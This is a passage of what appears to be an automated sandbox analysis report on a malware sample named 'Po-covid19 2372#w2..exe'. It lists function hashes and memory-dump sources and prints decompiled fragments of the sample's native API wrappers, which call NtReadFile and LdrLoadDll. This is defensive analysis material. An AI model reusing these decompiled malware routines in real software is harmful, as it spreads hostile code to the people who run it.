Instruction ID: 56d49ac39cfd01631964f8e62b6391375259820ef49933931a479d0394b487ff
Opcode Fuzzy Hash: d612d4cb9200c54b95b45d342582a05d69afe66ed387adea979eec97f44047da
Instruction Fuzzy Hash: A5E09233A41630CBC714FB48F4814B5B7A8E785A753288066F90CCB616E337D862C380

Uniqueness

Uniqueness Score: -1.00%

Function 0974FCC8, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.264125899.0000000009740000.00000040.00000001.sdmp, Offset: 09740000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c627ba27441140c9d512d8e6132b62517f2cc8f1d26030907042e9f09ac24e7e
Instruction ID: 1f4d14ad24e91b1496c9352b6a36cbd46356179fd8d873f5dd332cc6ea987473
Opcode Fuzzy Hash: c627ba27441140c9d512d8e6132b62517f2cc8f1d26030907042e9f09ac24e7e
Instruction Fuzzy Hash: FEE0263274020187DB289A2BA428B7F73DAEBC13A2F14403EF80AC2280CF30D80187A0

Uniqueness

Uniqueness Score: -1.00%

Function 0974AF50, Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.264125899.0000000009740000.00000040.00000001.sdmp, Offset: 09740000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ef0710724c04a637ef0900f61f8d8f47d20db96df26bd98560dfd42ecd21093
Instruction ID: 1a76e0667bec0cfc50302f13e6bfbfa11713e424fbe2a2ff293bcc957494dc1a
Opcode Fuzzy Hash: 8ef0710724c04a637ef0900f61f8d8f47d20db96df26bd98560dfd42ecd21093
Instruction Fuzzy Hash: B3E0121039C12413F98871E8551176E118F47D5F1BF00822AFB059F7C9ECE66C0503D1

Uniqueness

Uniqueness Score: -1.00%

Function 0974B5F8, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.264125899.0000000009740000.00000040.00000001.sdmp, Offset: 09740000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b17f9924409f7651d835999d1fb90aead8eb386718ed868cbe00e749d39d0978
Instruction ID: a4ea69f936d7edbbc6d670073db54877b097cfdd9ef63630856b22955d16cbe2
Opcode Fuzzy Hash: b17f9924409f7651d835999d1fb90aead8eb386718ed868cbe00e749d39d0978
Instruction Fuzzy Hash: BEE0E539514208EFCB45DFA8D948E88BFB5FF09311F1581A5EA088B272E732D960EF51

Uniqueness

Uniqueness Score: -1.00%

Function 09742BB0, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.264125899.0000000009740000.00000040.00000001.sdmp, Offset: 09740000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 856c06c6fdd0c715bd81fbb2cadfb169d7f4505d5468a77cf3a02a0902f75552
Instruction ID: 3b39c15f7b4b93d9e96454c9138e92538ea769dd5eba0bda18c856e6b5a6640e
Opcode Fuzzy Hash: 856c06c6fdd0c715bd81fbb2cadfb169d7f4505d5468a77cf3a02a0902f75552
Instruction Fuzzy Hash: EDF01230D2031A8FCB24DB64C9806EDB7B1BF95300F5086A5E009A7254EB706B84CF41

Uniqueness

Uniqueness Score: -1.00%

Function 09743092, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.264125899.0000000009740000.00000040.00000001.sdmp, Offset: 09740000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 306d0b369fd40403f74cdc34568767049a6de9fc90a06560a5f306c75e691406
Instruction ID: e9d9f45e7ae31a5c72d47c36ed1a3cf5a643f2d280bc6d73829c0cc457d7b89c
Opcode Fuzzy Hash: 306d0b369fd40403f74cdc34568767049a6de9fc90a06560a5f306c75e691406
Instruction Fuzzy Hash: 17F08231D102598FC714DB64C9406ECB3B5FF85340F008AE6E65977250EBB06AC5CF41

Uniqueness

Uniqueness Score: -1.00%

Function 09741A67, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.264125899.0000000009740000.00000040.00000001.sdmp, Offset: 09740000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60f550da7c982029996db8857d69bd6e2b6697b54824e50bade391aa0da6f49c
Instruction ID: 3979c4cf3f44b5a4940a739f91e007307de14790fdb0adcc3a22fae0df7a54e7
Opcode Fuzzy Hash: 60f550da7c982029996db8857d69bd6e2b6697b54824e50bade391aa0da6f49c
Instruction Fuzzy Hash: 50F0BC3690121A9FCB24CB64CA599E9BBB2FF09351F4484E5E21AA7231D7359A81EF00

Uniqueness

Uniqueness Score: -1.00%

Function 09741AF5, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.264125899.0000000009740000.00000040.00000001.sdmp, Offset: 09740000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c1ecdf4a1ead5ddd106e2bb1b6a4ba7098df76e536907208cf840fcdcaa2ddd
Instruction ID: 46353ac58f2a23fe2ff40ff4e1f7696d72b10083280a713610213de0427e91f8
Opcode Fuzzy Hash: 3c1ecdf4a1ead5ddd106e2bb1b6a4ba7098df76e536907208cf840fcdcaa2ddd
Instruction Fuzzy Hash: 30E08673D040119B8B04DB65C91A1AEBB71FF99341F0199666515D6624D33459418F81

Uniqueness

Uniqueness Score: -1.00%

Function 0974D770, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.264125899.0000000009740000.00000040.00000001.sdmp, Offset: 09740000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11e837f4d9568c982f9fef2ad731479eb264cbd414d384191b3c006636dd12bb
Instruction ID: 75a810c8073f4417c6f07f8ca7a8e5d695a83445469ae2d83add0beede9d365f
Opcode Fuzzy Hash: 11e837f4d9568c982f9fef2ad731479eb264cbd414d384191b3c006636dd12bb
Instruction Fuzzy Hash: 09E046318252089FC704FFF8E80469CBBB8EB41301F5042AAD84463250FB31AA98CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0974FBC0, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.264125899.0000000009740000.00000040.00000001.sdmp, Offset: 09740000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe4fea23a7bfc7b74710e5347e1867500cf8d9725d31bf10b6d7226db025cba7
Instruction ID: 9c41f201dccbebdb1fe076bc8d19ebedfef0d5cf9945fdd0b800534d840f7b2e
Opcode Fuzzy Hash: fe4fea23a7bfc7b74710e5347e1867500cf8d9725d31bf10b6d7226db025cba7
Instruction Fuzzy Hash: CEE046318252089FC705FFB8E80469CBBB8FB02305F5042AED844A2250FB319698CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0974BE18, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.264125899.0000000009740000.00000040.00000001.sdmp, Offset: 09740000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 925fa43b0e969153ee886b50769030c407563eeb49e5d69e839b13efa5c0f5a4
Instruction ID: 910812e84a2f962f299b86e92b528e20a5767d0bcbcc13329462779afa365b54
Opcode Fuzzy Hash: 925fa43b0e969153ee886b50769030c407563eeb49e5d69e839b13efa5c0f5a4
Instruction Fuzzy Hash: 73E0B674E142089FC744DFA8E444A9DBBB4FB49715F1081E9E84897361E7319945CF81

Uniqueness

Uniqueness Score: -1.00%

Function 0974D490, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.264125899.0000000009740000.00000040.00000001.sdmp, Offset: 09740000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc62c79e57a4a762d7aebf0398b17441eda3cf588af5dbd20a8bcd392d46c64e
Instruction ID: 6f6b1f6e6851f71b0c51866cb1fe158e06d9d3637fea12cb590c9aab703877a9
Opcode Fuzzy Hash: bc62c79e57a4a762d7aebf0398b17441eda3cf588af5dbd20a8bcd392d46c64e
Instruction Fuzzy Hash: 9FE0B674E04208DFC754EFA8E544A9DBBB4FB49305F2081EAE91897361E731AA05CF81

Uniqueness

Uniqueness Score: -1.00%

Function 0974AF08, Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.264125899.0000000009740000.00000040.00000001.sdmp, Offset: 09740000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 107107782ab76bd261ab894180ff0cf7bd904e28c9fab124f3a147682a8673d8
Instruction ID: 7984496ec1bef34622013c4e5bd71aea81d24c31f5165b65b11623c225f0b57b
Opcode Fuzzy Hash: 107107782ab76bd261ab894180ff0cf7bd904e28c9fab124f3a147682a8673d8
Instruction Fuzzy Hash: 89E08CB0D14208AFCB44EFF8A8043DDBBF8EB44304F1001E9880893240EB315A82CB81

Uniqueness

Uniqueness Score: -1.00%

Function 09743041, Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.264125899.0000000009740000.00000040.00000001.sdmp, Offset: 09740000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff9437b19e5609ff785adcf48655a1d32e2de286ce90f405b059f0e488073a65
Instruction ID: 1e87236670b8fdb1d29b074cb74dd202558ac8b0c643bb3c919f71af76303cd3
Opcode Fuzzy Hash: ff9437b19e5609ff785adcf48655a1d32e2de286ce90f405b059f0e488073a65
Instruction Fuzzy Hash: 1FE0C234E00268DFDB90CBA8C94469DB7B2EF88254F5184A6940AA7654D734AE81DF20

Uniqueness

Uniqueness Score: -1.00%

Function 09744231, Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.264125899.0000000009740000.00000040.00000001.sdmp, Offset: 09740000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e8f3ae7919d9358b6604df2970cd82e45bdd1b17351ccf5be8addc2e5d258f2
Instruction ID: d890fe0f4983a34b99a5d064aaedc9a1ebfa0cd6e45fcd29886224f836272fce
Opcode Fuzzy Hash: 0e8f3ae7919d9358b6604df2970cd82e45bdd1b17351ccf5be8addc2e5d258f2
Instruction Fuzzy Hash: 31E0E571E043198FD724CF28C844AAEBBB1FF5A211F4494A9D50AE7B18D3309E81CF42

Uniqueness

Uniqueness Score: -1.00%

Function 0974301B, Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.264125899.0000000009740000.00000040.00000001.sdmp, Offset: 09740000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13f934c7fac950fd10ddc088c0182b0902e0f6e313313d564d8e58cb1e6f095d
Instruction ID: 5b8355c1e37c30c58af37b70788c77c76ebce279b3472a3ce8085806bfe18aeb
Opcode Fuzzy Hash: 13f934c7fac950fd10ddc088c0182b0902e0f6e313313d564d8e58cb1e6f095d
Instruction Fuzzy Hash: E0E08631D00228DBD754CBA8C90439EB7B7FF84358F518496900AE7754CB34AD41DF10

Uniqueness

Uniqueness Score: -1.00%

Function 0974EBBC, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.264125899.0000000009740000.00000040.00000001.sdmp, Offset: 09740000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d1a993eac22b34fc90128145ef202052e4a7cee841e52e893536f53eb154595
Instruction ID: c021a8a4e4e3542aa022836ac0591412cc1618287169c3fd5d7252861f05d88b
Opcode Fuzzy Hash: 6d1a993eac22b34fc90128145ef202052e4a7cee841e52e893536f53eb154595
Instruction Fuzzy Hash: C9D0C936285118BFDA40AA989940E6A3B69EB09754B50A405BA088A203C732E862DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 097411A0, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.264125899.0000000009740000.00000040.00000001.sdmp, Offset: 09740000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae20df7d8948f2d6b6db12222f4e1ff8c6f54488b953516f81bab3831e84af06
Instruction ID: 3907542c72633f3c9b079f791b23454a80846eb71f66de673b67cc7575df7c2b
Opcode Fuzzy Hash: ae20df7d8948f2d6b6db12222f4e1ff8c6f54488b953516f81bab3831e84af06
Instruction Fuzzy Hash: 4BE075349012198FD714CB18D989AAEB7B1FF59350F4086A5D54AA7255C7749D81CF40

Uniqueness

Uniqueness Score: -1.00%

Function 09742041, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.264125899.0000000009740000.00000040.00000001.sdmp, Offset: 09740000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43534ac154f86821f1c3b05db1b53dc95c342867f1421d6496cc197d5a7e5ebf
Instruction ID: 516495927c6060bd085388735c644686e3032d3531a18097e4a8dfb4ce9d9274
Opcode Fuzzy Hash: 43534ac154f86821f1c3b05db1b53dc95c342867f1421d6496cc197d5a7e5ebf
Instruction Fuzzy Hash: BCE04670D012A9AFCB248F64C9400DDBBB2FF44380F0084868549F6220D3B89FC5EE60

Uniqueness

Uniqueness Score: -1.00%

Function 0974B3F4, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.264125899.0000000009740000.00000040.00000001.sdmp, Offset: 09740000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b5ed22ab70ec5145d4d635dbec1dac8989eca2d70308cce1e0da1768a6007b7
Instruction ID: 82c3a59bb42c0b4e92e38b45086e30a47b9eaba94a7dd6999572811e14cecba4
Opcode Fuzzy Hash: 5b5ed22ab70ec5145d4d635dbec1dac8989eca2d70308cce1e0da1768a6007b7
Instruction Fuzzy Hash: 01D0C932245108BBCB426A98C840A1A7B2ABB45BA4F20D405F6044D156C773E962D794

Uniqueness

Uniqueness Score: -1.00%

Function 09744F9B, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.264125899.0000000009740000.00000040.00000001.sdmp, Offset: 09740000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aedcf1daf8a0441c7917b9043083ab1b951261908f7d2632a6d37f7bfa1bfa19
Instruction ID: 2272f3b09db542e4cbc41edea4462a80f30b000ecccfbd00e7d0dd0a0e7188da
Opcode Fuzzy Hash: aedcf1daf8a0441c7917b9043083ab1b951261908f7d2632a6d37f7bfa1bfa19
Instruction Fuzzy Hash: 98D02276C00812ABCB008EA8CA0018DF730FB4420030964408402DE225D3798101BF00

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00BC5438, Relevance: 2.7, Strings: 2, Instructions: 161COMMON

Download Yara Rule

Strings

qqE, xrefs: 00BC54D9
O{k, xrefs: 00BC54A9

Memory Dump Source

Source File: 00000000.00000002.250491847.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: false

Similarity

API ID:
String ID: O{k$qqE
API String ID: 0-3483281891
Opcode ID: 721c511a85fdc82bf1cff2bd0255b96ac28bc6101d114d95a7fd7f4346e401ec
Instruction ID: 872ecfba7a0763cc4d7beb36ecc93e8ab56d3e7163a0296096c5e9cab94cd421
Opcode Fuzzy Hash: 721c511a85fdc82bf1cff2bd0255b96ac28bc6101d114d95a7fd7f4346e401ec
Instruction Fuzzy Hash: 3761C474E156198FCB08CFAAC580ADEFBF6BF88311F24946AD415B7314D334A981CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00BC5429, Relevance: 2.7, Strings: 2, Instructions: 159COMMON

Download Yara Rule

Strings

qqE, xrefs: 00BC54D9
O{k, xrefs: 00BC54A9

Memory Dump Source

Source File: 00000000.00000002.250491847.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: false

Similarity

API ID:
String ID: O{k$qqE
API String ID: 0-3483281891
Opcode ID: 3c46124ed4740b697700c5cfbf1a96af1a9b10f43a4a0bd1a7d050aced1cfd5d
Instruction ID: 54439a2fd68eb285aa9bf20d799129a5e8be32f2713377196d1202eae9f1daca
Opcode Fuzzy Hash: 3c46124ed4740b697700c5cfbf1a96af1a9b10f43a4a0bd1a7d050aced1cfd5d
Instruction Fuzzy Hash: 0F61E574E156198FCB08CFAAC580ADEFBF6BF88311F24956AD405B7314E334A981CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00BC4000, Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.250491847.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c9ba79fe62a2451cac0bf946f817e3cca7c220827888d021b0960223fe07e2f
Instruction ID: 17f468db06303fb921fdcf68eb1cfeaa4548d74eb947c97e90dc930c77ed6087
Opcode Fuzzy Hash: 7c9ba79fe62a2451cac0bf946f817e3cca7c220827888d021b0960223fe07e2f
Instruction Fuzzy Hash: B481E374E15219DFCB44CF99D48499EFBF1FB88310F14956AE429AB224D731AA41CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00BC3FF0, Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.250491847.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5461ab8f715c3235dd39094e645a34048a727996c6a5527217992f4b85d82a5a
Instruction ID: 676c1cf0cbc11be7d87a94bcef65a4286235170eed0b0b4670a98e66c2da3002
Opcode Fuzzy Hash: 5461ab8f715c3235dd39094e645a34048a727996c6a5527217992f4b85d82a5a
Instruction Fuzzy Hash: CE810374E15219DFCB44CF99D484A9EFBF1FB88310F1495AAE429AB224D731AA41CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00BC4E78, Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.250491847.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75304311654fd145c245ce9d56d1a55c1e61725262ea2483b4bcae1b052eb0bf
Instruction ID: accf52af99cba5df28f151f5b5bb1d9f07210c4de07e9863db73cf9a2a562d1c
Opcode Fuzzy Hash: 75304311654fd145c245ce9d56d1a55c1e61725262ea2483b4bcae1b052eb0bf
Instruction Fuzzy Hash: 52613AB5E0421ADFCB04CFA5C591AEEFBF2BF98300F24815AD455AB211D7349A42CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00BC5852, Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.250491847.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4effcbed0fb4ea9ff6e318f3ee1d6b37ef2239fc03e63e0c330afd593b039b1
Instruction ID: 184f0117b1a74c15df8744ef6182160a2b5b2a7922e72513a7f6fff9b94d78ff
Opcode Fuzzy Hash: e4effcbed0fb4ea9ff6e318f3ee1d6b37ef2239fc03e63e0c330afd593b039b1
Instruction Fuzzy Hash: A5414DB1E056198BDB18CF6B9D4479EFAF3BFC9300F14C1BA950CA6265EB301A468E51

Uniqueness

Uniqueness Score: -1.00%

Function 00BC5220, Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.250491847.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 166b5690b3ad7eee4f58c02eee6509c0ed4747cb70340bd6626fe646332953bd
Instruction ID: 2164e87cb81012e41fcb4ffee708469886baaa273a1b9ac448078ff190290c7c
Opcode Fuzzy Hash: 166b5690b3ad7eee4f58c02eee6509c0ed4747cb70340bd6626fe646332953bd
Instruction Fuzzy Hash: C841E9B0E046099FCB14CFAAC5816EEFBF2BF99340F24C46AC815A7254E734A681CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00BC5698, Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.250491847.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c826e6c4b8fdf39b3d619d92c68b7c5315a3918ce19095f3272ec5e98cbc3cfc
Instruction ID: 7cbc916a7b2b619fd7bb984701ef5b7f05ec854daef1d4b5abf30322c5e40ecd
Opcode Fuzzy Hash: c826e6c4b8fdf39b3d619d92c68b7c5315a3918ce19095f3272ec5e98cbc3cfc
Instruction Fuzzy Hash: 8C41EBB4E05609CBCB54CF9AC5806EEFBF2FF88300F64D5AAD505A7254D7346A81CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00BC5689, Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.250491847.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eda9037fd782df910bcce4faef9370b39b9a9e6d45a06e0bc30c573ab5bc0fd4
Instruction ID: e4ceb6e70530c378e79834e9c749000258bf765c0a90d3dd912f1d2425f0643d
Opcode Fuzzy Hash: eda9037fd782df910bcce4faef9370b39b9a9e6d45a06e0bc30c573ab5bc0fd4
Instruction Fuzzy Hash: 74410CB0E0460ACBCB04CFAAC5816AEFBF2FF88310F64D16AD505A7254D7346A818B94

Uniqueness

Uniqueness Score: -1.00%

Function 00BC5230, Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.250491847.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39d12b1241c8b0c8e3e2389557c12c7df1181570c2c0333559887652e70071e3
Instruction ID: a41ce252271f9088192b8f1acff138092c1e6aa873ac418991532b723a9e6dd9
Opcode Fuzzy Hash: 39d12b1241c8b0c8e3e2389557c12c7df1181570c2c0333559887652e70071e3
Instruction Fuzzy Hash: 5C41C9B0E04609DBDB14CFAAC581AAEFBF2BF98340F24C56AC415B7254D734A6818F54

Uniqueness

Uniqueness Score: -1.00%

Function 0974F538, Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.264125899.0000000009740000.00000040.00000001.sdmp, Offset: 09740000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6052654cca0c4eba641d0e1fe74efc2745e8f9bb83a2dbc2f21f27fa433c326
Instruction ID: cf0f1193b760f6c56527f22a551f71e1546d2eb3a1113e9b6d361d21eb7b896d
Opcode Fuzzy Hash: e6052654cca0c4eba641d0e1fe74efc2745e8f9bb83a2dbc2f21f27fa433c326
Instruction Fuzzy Hash: F5313775E112199FDB08CFAAD940A9EFBF6FF89300F10C1AAD408A7315D7349A418F50

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Po-covid19 2372#w2..exe PID: 5404 Parent PID: 5532 Po-covid19 2372#w2..exeCOMMON

Executed Functions

Function 00419FEA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E00419FEA(void* __eax, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t20;
				void* _t29;
				void* _t30;
				intOrPtr* _t31;
				void* _t33;

				asm("repe push esi");
				_t15 = _a4;
				_t31 = _a4 + 0xc48;
				E0041AB40(_t29, _t15, _t31,  *((intOrPtr*)(_t15 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d42
				_t12 =  &_a8; // 0x414d42
				_t20 =  *((intOrPtr*)( *_t31))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40, _t30, _t33); // executed
				return _t20;
			}

0x00419fea
0x00419ff3
0x00419fff
0x0041a007
0x0041a012
0x0041a02d
0x0041a035
0x0041a039

APIs

NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 0041A035

Strings

BMA, xrefs: 0041A02D, 0041A034
BMA, xrefs: 0041A012, 0041A020

Memory Dump Source

Source File: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: BMA$BMA
API String ID: 2738559852-2163208940
Opcode ID: 81fb90e17614b8a50f8de43df0e79fcfbaa185c8e02fd90fd218aa395eeb42ac
Instruction ID: 62973a741be81607df5ae8ff17d51843b94a3d423a14d42c24009a5073d7a04b
Opcode Fuzzy Hash: 81fb90e17614b8a50f8de43df0e79fcfbaa185c8e02fd90fd218aa395eeb42ac
Instruction Fuzzy Hash: EDF017B2200208AFCB04DF89CC91EEB77ADEF8C714F158248BE1DA7241D634E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00419FF0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00419FF0(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041AB40(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d42
				_t12 =  &_a8; // 0x414d42
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}

0x00419ff3
0x00419fff
0x0041a007
0x0041a012
0x0041a02d
0x0041a035
0x0041a039

APIs

NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 0041A035

Strings

BMA, xrefs: 0041A02D, 0041A034
BMA, xrefs: 0041A012, 0041A020

Memory Dump Source

Source File: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: BMA$BMA
API String ID: 2738559852-2163208940
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 47391d639efac316311ffb50b35ad37227ecba0ab777e9e89f8ea37865c82293
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 86F0A4B2200208ABCB14DF89DC91EEB77ADAF8C754F158249BA1D97241D634E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACD0, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040ACD0(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041C830( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041CC50(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041CED0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041B080(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x0040acec
0x0040acef
0x0040acf4
0x0040acf9
0x0040ad03
0x0040ad08
0x0040ad0b
0x0040ad0d
0x0040ad15
0x0040ad1a
0x0040ad1a
0x0040ad21
0x0040ad29
0x0040ad2c
0x0040ad2e
0x0040ad42
0x00000000
0x0040ad44
0x0040ad4a
0x0040acfe
0x0040acfe
0x0040acfe

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42

Memory Dump Source

Source File: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 871812e978c9dc0736c26a3a947503de5d60d789a5a3397ba4c50f8434c37349
Instruction ID: b4f7a1af0e17271dbab1f8f9811de8a59031fb4189e0604a5181f46414007b8b
Opcode Fuzzy Hash: 871812e978c9dc0736c26a3a947503de5d60d789a5a3397ba4c50f8434c37349
Instruction Fuzzy Hash: 440112B5D4020DA7DB10DAA5DC82FDEB7799B54308F0041A9E908A7281F635EB54CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00419F40, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419F40(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041AB40(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
